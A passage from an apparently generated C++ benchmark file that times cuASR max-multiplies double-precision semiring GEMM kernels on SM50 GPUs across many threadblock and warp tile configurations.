using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x32x1_8x4_4x8_2x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 16 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_8x16x1_2x2_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_8x16x1_2x2_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_8x32x1_2x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_8x32x1_2x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x16x1_4x2_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x16x1_4x2_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x32x1_4x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x32x1_4x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 32 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x64x1_4x8_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x64x1_4x8_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 2 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x16x1_4x4_8x4_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x16x1_4x4_8x4_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 0) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x32x1_8x4_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x32x1_8x4_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 2 // Threadblock: 128 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_64x16x1_8x4_8x4_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<128, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<64, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_128x32x8_64x16x1_8x4_8x4_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 16 x 64 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x16_8x16x1_2x2_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x16_8x16x1_2x2_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 16 x 128 x 16 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x16_8x32x1_2x4_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 128, 16>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 16>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x16_8x32x1_2x4_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 4 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x8x1_2x2_8x4_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 8, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x8x1_2x2_8x4_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x16x1_4x2_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_16x16x1_4x2_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 4 // Threadblock: 32 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x32x1_4x4_4x8_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x128x8_16x32x1_4x4_4x8_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 2 x 4 // Threadblock: 64 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x16x1_4x4_8x4_2x4(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x64x8_32x16x1_4x4_8x4_2x4) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_8x16x1_2x2_4x8_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); cudaDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_8x16x1_2x2_4x8_4x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 4 x 2 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_16x16x1_4x2_4x8_4x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using 